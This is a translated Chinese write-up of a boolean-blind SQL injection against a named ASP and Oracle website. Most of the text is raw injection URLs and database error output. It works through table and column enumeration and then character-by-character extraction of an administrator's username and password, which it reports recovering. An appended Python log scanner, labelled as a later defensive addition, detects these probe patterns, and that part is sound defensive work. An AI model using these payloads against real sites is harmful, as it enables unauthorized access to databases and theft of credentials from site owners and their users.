Notes on One Injection Against ASP+Oracle
http://et.kpworld.com/star.asp?performer=马三立;
------------------------------------------------------
OraOLEDB 错误 '80040e14' ORA-00911: invalid character /star.asp,行83
This shows the semicolon is filtered.
http://et.kpworld.com/star.asp?performer=马三立'
----------------------------------------------------
OraOLEDB 错误 '80004005' ORA-01756: 引号内的字符串没有正确结束 /star.asp,行83
So there is an unfiltered single-quote problem.
http://et.kpworld.com/star.asp?performer=马三立' and '1'='1
----------------------------------------------------------------
Closing the single quote: the page returns normally.
and 0<(select count(*) from admin) and '1'='1
-----------------------------------------------------------------
OraOLEDB 错误 '80040e37' ORA-00942: table or view does not exist /star.asp,行83
This shows there is no table named ADMIN.
Next we need to know Oracle's system tables (below, 表名 stands for the table name):
Number of rows in a table (user_tables holds all tables of the current user):
select num_rows from user_tables where table_name='表名'
Column names of a table (user_tab_columns holds all columns):
select column_name from user_tab_columns where table_name='表名'
and 0<(select count(*) from all_tables) and '1'='1
---------------------------------------------------------------------
Exists!
all_tables is a system view that holds all tables of the current ID and of other users.
and 0<(select count(*) from user_tables) and '1'='1
---------------------------------------------------------------------
Returns. This system view exists; it holds all tables of the current user.
and 0<(select top 1 table_name from user_tables) and '1'='1
---------------------------------------------------------------------------------
OraOLEDB 错误 '80040e14' ORA-00923: FROM keyword not found where expected /star.asp,行83
TOP 1 not supported?...... that explanation does not seem quite right...
(PINKEYES' testing has confirmed that TOP 1 really is not supported)
and 0<(select count(*) from user_tables where table_nam'') and '1'='1
--------------------------------------------------------------------------------------------
OraOLEDB 错误 '80040e14' ORA-00904: invalid column name /star.asp,行83
When there is a syntax error, it reports "invalid column name".
and 0<(select count(*) from user_tables where table_name'''') and '1'='1
--------------------------------------------------------------------------------------------
When the syntax is correct the success marker comes back; it seems four single quotes stand for empty. Next, tests of a few functions:
and 0<(select count(*) from user_tables where sum(table_name)>1) and '1'='1
------------------------------------------------------------------------------------------------
OraOLEDB 错误 '80040e14' ORA-00934: group function is not allowed here /star.asp,行83
Group functions are not allowed here.
and 0<(select count(*) from user_tables where avg(table_name)) and '1'='1
-------------------------------------------------------------------------------------------
OraOLEDB 错误 '80040e14' ORA-00934: group function is not allowed here /star.asp,行83
Group functions are not allowed here.
and 0<(select to_char(table_name) from user_tables) and%20'1'='1
--------------------------------------------------------------------------
OraOLEDB 错误 '80004005' ORA-01427: single-row subquery returns more than one row /star.asp,行83
A single-row subquery returned more than one row.
and 0<(select count(*) from user_tables where table_name+1) and%20'1'='1
--------------------------------------------------------------------------
OraOLEDB 错误 '80040e14' ORA-00920: invalid relational operator /star.asp,行83
That is as far as the function tests go; now let's see how to get its tables out:
and 0<(select count(*) from performer) and%20'1'='1
-----------------------------------------------------
Returned successfully. This table name was guessed from the URL.
and 0<(select count(*) from user_tables where table_name='performer') and%20'1'='1
-------------------------------------------------------------------------------------
No return. Failure marker.
and%200<(select%20count(*)%20from%20user_tables%20where%20table_name='PERFORMER')%20and%20'1'='1
------------------------------------------------------------------------------------------------
Success! It seems user_tables only understands uppercase letters!
and 0<(select count(*) from user_tables where length(table_name)>10) and%20'1'='1
------------------------------------------------------------------------------------
Use the length function to determine the length of the longest table name.
and 0<(select count(*) from user_tables where length(table_name)=18) and%20'1'='1
-------------------------------------------------------------------------------------
Skipping a number of steps, the longest table name is finally determined to be 18 characters.
and 0<(select count(*) from user_tables where substr(table_name,1,1)='A') and%20'1'='1
-----------------------------------------------------------------------------------------
The first character is 'A'.
and 0<(select count(*) from user_tables where substr(table_name,1,2)='AD') and%20'1'='1
-----------------------------------------------------------------------------------------
The first two characters are 'AD'.
and 0<(select count(*) from user_tables where substr(table_name,1,18)='ADMINAUTHORIZATION') and%20'1'='1
---------------------------------------------------------------------------------------------
Skipping some steps, the 18-character table name is 'ADMINAUTHORIZATION'.
and 1=(select count(*) from user_tables where table_name='ADMINAUTHORIZATION') and%20'1'='1
--------------------------------------------------------------------------------------------
Returns.
and 0<(select count(*) from user_tables where length(table_name)=2) and%20'1'='1
----------------------------------------------------------------------------------
The shortest table name is 2 characters.
and%200<(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20'%25user%25')%20and%20%20'1'='1
-------------------------------------------------------------------------------------------------
No return.
and%200<(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20'%25ADMIN%25')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200<(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20'%25PER%25')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200<(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20'%25BBS%25')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
All returned successfully. So LIKE can be used for guessing.
and%200<(select%20count(*)%20from%20user_tables%20where%20table_name%20like'%25BBS%25'%20and%20length(table_name)>8)%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200<(select%20count(*)%20from%20user_tables%20where%20table_name%20like'%25BBS%25'%20and%20length(table_name)>10)%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200<(select%20count(*)%20from%20user_tables%20where%20table_name%20like'%25BBS%25'%20and%20length(table_name)=10)%20and%20'1'='1
-------------------------------------------------------------------------------------------------
Combining LIKE with LENGTH pins down the length right away.
and%200<(select%20count(*)%20from%20user_tables%20where%20substr(table_name,1,4)='BBSS')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
The fourth character is S. From here on it is repetitive work.
and%200<(select%20count(*)%20from%20user_tables%20where%20substr(table_name,1,10)='BBSSUBJECT')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
Got it: 'BBSSUBJECT'.
and%200<(select%20count(*)%20from%20user_tab_columns%20where%20table_name='BBSSUBJECT'%20and%20column_name%20like%20'%25USER%25')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
No return; this does not look like the table that stores users and passwords. Try again...
and%200<(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20'%25USER%25')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200<(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20'%25USER%25'%20and%20length(table_name)>10)%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200<(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20'%25USER%25'%20and%20length(table_name)>15)%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200<(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20'%25USER%25'%20and%20length(table_name)=15)%20and%20'1'='1
-------------------------------------------------------------------------------------------------
Length determined to be 15.
and%200<(select%20count(*)%20from%20user_tables%20where%20substr(table_name,1,1)='U'%20and%20length(table_name)=15)%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200<(select%20count(*)%20from%20user_tables%20where%20substr(table_name,2,1)='S'%20and%20length(table_name)=15)%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200<(select%20count(*)%20from%20user_tables%20where%20substr(table_name,-4,4)='USER'%20and%20length(table_name)=15)%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200<(select%20count(*)%20from%20user_tables%20where%20length(table_name)=15%20and%20substr(table_name,-15,15)='UNSUBSCRIBEUSER')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200<(select%20count(*)%20from%20user_tables%20where%20table_name='UNSUBSCRIBEUSER')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
Table name confirmed as 'UNSUBSCRIBEUSER'; next, guess whether there is a password column...
and%200<(select%20count(*)%20from%20user_tab_columns%20where%20table_name='UNSUBSCRIBEUSER'%20and%20column_name%20like%20'%25USER%25')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200<(select%20count(*)%20from%20user_tab_columns%20where%20table_name='UNSUBSCRIBEUSER'%20and%20column_name%20like%20'%25PASS%25')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
LIKE PASS: no return. Frustrating; continue.
and%200<(select%20count(*)%20from%20user_tab_columns%20where%20column_name%20like%20'%25PASS%25'%20and%20length(table_name)=13)%20and%20'1'='1
-------------------------------------------------------------------------------------------------
Returns. Not correct.
and%200<(select%20count(*)%20from%20user_tab_columns%20where%20substr(column_name,-2,2)='SS')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200<(select%20count(*)%20from%20user_tab_columns%20where%20substr(column_name,6,2)='SS')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200<(select%20count(*)%20from%20user_tab_columns%20where%20substr(column_name,4,4)='PASS')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
SUBSTR is used here to narrow the range.
and%200<(select%20count(*)%20from%20user_tab_columns%20where%20substr(column_name,4,4)='PASS'%20and%20length(column_name)=11)%20and%20'1'='1
-------------------------------------------------------------------------------------------------
The column containing PASS is 11 characters long. Since, per the probe above, the 4 characters starting at position 4 are PASS, there are 3 characters before PASS and 4 after, 11 in all.
and%200<(select%20count(*)%20from%20user_tab_columns%20where%20substr(column_name,4,8)='PASSWORD')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
Take a guess, and sure enough...
and%200<(select%20count(*)%20from%20user_tab_columns%20where%20substr(column_name,-11,11)='STRPASSWORD')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200<(select%20count(*)%20from%20user_tab_columns%20where%20column_name='STRPASSWORD')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200<(select%20count(*)%20from%20user_tab_columns%20where%20column_name='STRPASSWORD'%20and%20length(table_name)=13)
-------------------------------------------------------------------------------------------------
and%200<(select%20count(*)%20from%20user_tab_columns%20where%20column_name='STRPASSWORD'%20and%20length(table_name)=13)%20and%20'1'='1
-------------------------------------------------------------------------------------------------
All returned; the password column name is confirmed as 'STRPASSWORD'. Once the password column is captured the rest is easy; now use it to get the table name:
and%200<(select%20count(*)%20from%20user_tab_columns%20where%20column_name='STRPASSWORD'%20and%20length(table_name)=13) and '1'='1
-------------------------------------------------------------------------------------------------
Returns, matching the table-name length guessed above. Use SUBSTR to guess its name:
and%200<(select%20count(*)%20from%20user_tab_columns%20where%20column_name='STRPASSWORD'%20and%20substr(table_name,1,13)='ADMINISTRATOR') and '1'='1
-------------------------------------------------------------------------------------------------
and%200<(select%20count(*)%20from%20user_tab_columns%20where%20column_name='STRPASSWORD'%20and%20table_name='ADMINISTRATOR') and '1'='1
-------------------------------------------------------------------------------------------------
and%200<(select%20count(*)%20from%20user_tables%20where%20table_name='ADMINISTRATOR') and '1'='1
-------------------------------------------------------------------------------------------------
All returned; the table name is confirmed as 'ADMINISTRATOR'.
and%208=(select%20count(*)%20from%20user_tab_columns%20where%20table_name='ADMINISTRATOR') and '1'='1
-------------------------------------------------------------------------------------------------
The table has 8 columns.
and%200<(select%20count(*)%20from%20user_tab_columns%20where%20table_name='ADMINISTRATOR'%20and%20column_name%20like%20'%25ID%25')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%203=(select%20count(*)%20from%20ADMINISTRATOR) and '1'='1
-------------------------------------------------------------------------------------------------
and%200<(select%20count(*)%20from%20user_tab_columns%20where%20table_name='ADMINISTRATOR'%20and%20substr(column_name,4,2)='ID')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200<(select%20count(*)%20from%20user_tab_columns%20where%20table_name='ADMINISTRATOR'%20and%20substr(column_name,-2,2)='ID')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
We can conclude the name ends in ID and is 5 characters long.
and%200<(select%20count(*)%20from%20user_tab_columns%20where%20table_name='ADMINISTRATOR'%20and%20substr(column_name,-5,5)='LNGID')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200<(select%20count(*)%20from%20user_tab_columns%20where%20table_name='ADMINISTRATOR'%20and%20column_name='LNGID')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
Got it: LNGID.
and%200<(select%20count(*)%20from%20ADMINISTRATOR%20where%20length(LNGID)=2)%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%208=(select%20min(LNGID)%20from%20ADMINISTRATOR)%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%2021=(select%20max(LNGID)%20from%20ADMINISTRATOR)%20and%20'1'='1
-------------------------------------------------------------------------------------------------
Minimum and maximum IDs obtained; next, the password:
and%200<(select%20count(*)%20from%20ADMINISTRATOR%20where%20length(STRPASSWORD)=4%20and%20LNGID=8)%20and%20'1'='1
-------------------------------------------------------------------------------------------------
The password for LNGID 8 is 4 characters long.
and%200<(select%20count(*)%20from%20ADMINISTRATOR%20where%20ascii(substr(STRPASSWORD,1,1))=116%20and%20LNGID=8)%20and%20'1'='1
-------------------------------------------------------------------------------------------------
First character
and%200<(select%20count(*)%20from%20ADMINISTRATOR%20where%20ascii(substr(STRPASSWORD,2,1))=101%20and%20LNGID=8)%20and%20'1'='1
-------------------------------------------------------------------------------------------------
Second character
and%200<(select%20count(*)%20from%20ADMINISTRATOR%20where%20ascii(substr(STRPASSWORD,3,1))=115%20and%20LNGID=8)%20and%20'1'='1
-------------------------------------------------------------------------------------------------
Third character
and%200<(select%20count(*)%20from%20ADMINISTRATOR%20where%20ascii(substr(STRPASSWORD,4,1))=116%20and%20LNGID=8)%20and%20'1'='1
-------------------------------------------------------------------------------------------------
Fourth character
STRPASSWORD:test
and%200<(select%20count(*)%20from%20ADMINISTRATOR%20where%20STRPASSWORD='test'%20and%20LNGID=8)%20and%20'1'='1
-------------------------------------------------------------------------------------------------
OH, YEAH~~ the password is out.
Now the username:
and%200<(select%20count(*)%20from%20user_tab_columns%20where%20table_name='ADMINISTRATOR'%20and%20column_name%20like%20'%25NAME%25')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200<(select%20count(*)%20from%20user_tab_columns%20where%20table_name='ADMINISTRATOR'%20and%20substr(column_name,4,4)='NAME')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200<(select%20count(*)%20from%20user_tab_columns%20where%20table_name='ADMINISTRATOR'%20and%20substr(column_name,-4,4)='NAME')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200<(select%20count(*)%20from%20user_tab_columns%20where%20table_name='ADMINISTRATOR'%20and%20substr(column_name,1,7)='STRNAME')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
Got it, column: STRNAME
and%200<(select%20count(*)%20from%20user_tab_columns%20where%20table_name='ADMINISTRATOR'%20and%20column_name%20not%20in('STRNAME','STRPASSWORD','LNGID'))%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200<(select%20count(*)%20from%20ADMINISTRATOR%20where%20STRPASSWORD='test'%20and%20LNGID=8%20and%20length(STRNAME)=4)%20and%20'1'='1
-------------------------------------------------------------------------------------------------
The STRNAME value is 4 characters long; it wouldn't be the same as the password, would it...
and%200<(select%20count(*)%20from%20ADMINISTRATOR%20where%20STRPASSWORD='test'%20and%20LNGID=8%20and%20STRNAME='test')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
Heh, sure enough.
Table name ADMINISTRATOR, columns: STRNAME, STRPASSWORD, LNGID
LNGID=8 STRNAME=test STRPASSWORD=test
Test complete! The rest is only a matter of time.
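As an added, defender-side example (not part of the original post), here is a small Python scanner that matches the probe shapes used throughout this write-up (0<(select ...) with the trailing '1'='1 tautology, the user_tables / all_tables / user_tab_columns dictionary views, and ascii(substr()) / length() character inference) in IIS W3C-style log lines, and reports any source that fires them repeatedly against one page and parameter. The log lines are constructed to mirror the probes above; the IP addresses and the parameter value x are placeholders.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed IIS W3C-style lines (date time c-ip cs-method cs-uri-stem cs-uri-query sc-status).
# The probes copy the shapes in the write-up; the IPs and the value "x" are placeholders, not real data.
SAMPLE_LOG = """\
2004-03-01 10:00:01 203.0.113.7 GET /star.asp performer=%E9%A9%AC%E4%B8%89%E7%AB%8B 200
2004-03-01 10:00:05 203.0.113.7 GET /star.asp performer=x'%20and%200<(select%20count(*)%20from%20user_tables)%20and%20'1'='1 200
2004-03-01 10:00:09 203.0.113.7 GET /star.asp performer=x'%20and%200<(select%20count(*)%20from%20user_tables%20where%20length(table_name)=18)%20and%20'1'='1 200
2004-03-01 10:00:12 203.0.113.7 GET /star.asp performer=x'%20and%200<(select%20count(*)%20from%20ADMINISTRATOR%20where%20ascii(substr(STRPASSWORD,1,1))=116%20and%20LNGID=8)%20and%20'1'='1 200
2004-03-01 10:00:15 203.0.113.7 GET /star.asp performer=x'%20and%200<(select%20count(*)%20from%20ADMINISTRATOR%20where%20ascii(substr(STRPASSWORD,2,1))=101%20and%20LNGID=8)%20and%20'1'='1 200
2004-03-01 10:01:00 198.51.100.9 GET /star.asp performer=%E9%A9%AC%E4%B8%89%E7%AB%8B 200
"""

# Signals of the Oracle boolean-blind technique above. Every probe got HTTP 200, so status-code
# alerting sees nothing; the tell is in the query string. Matching is case-insensitive because
# Oracle folds unquoted identifiers to uppercase anyway.
BOOL_PROBE = re.compile(r"\b0\s*<\s*\(\s*select\b|'1'\s*=\s*'1", re.I)
DICT_VIEWS = re.compile(r"\b(user_tables|all_tables|user_tab_columns)\b", re.I)
INFERENCE = re.compile(r"\b(ascii|substr|length)\s*\(", re.I)

def parse_line(line):
    """Split one W3C log line into its fields; the query is percent-decoded for matching."""
    fields = line.split()
    if len(fields) != 7:
        return None
    _, _, ip, _, stem, query, status = fields
    return {"ip": ip, "stem": stem, "query": unquote_plus(query), "status": int(status)}

def classify(query):
    """Return the sorted list of injection signals present in a decoded query string."""
    signals = []
    if BOOL_PROBE.search(query):
        signals.append("boolean-probe")
    if DICT_VIEWS.search(query):
        signals.append("dictionary-enum")
    if INFERENCE.search(query):
        signals.append("char-inference")
    return sorted(signals)

def analyze(log_text, burst_threshold=3):
    """Flag every probe and list the (ip, page, parameter) tuples that sent at least
    burst_threshold probes: that is what character-by-character extraction looks like server-side."""
    findings, counts = [], defaultdict(int)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        signals = classify(rec["query"])
        if not signals:
            continue
        param = rec["query"].split("=", 1)[0]
        findings.append((rec["ip"], rec["stem"], param, signals))
        counts[(rec["ip"], rec["stem"], param)] += 1
    bursts = [key for key, n in counts.items() if n >= burst_threshold]
    return findings, bursts
```

Call analyze(SAMPLE_LOG) to get the per-request findings and the list of sources that crossed the burst threshold; a real deployment would feed it the web server's own W3C log and key the burst count on a time window as well.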
- Author: 福州军威计算机技术有限公司
Copyright notice: original work; reposting is permitted, but when reposting you must indicate the original source, author information and this notice in hyperlink form. Otherwise legal action will be pursued.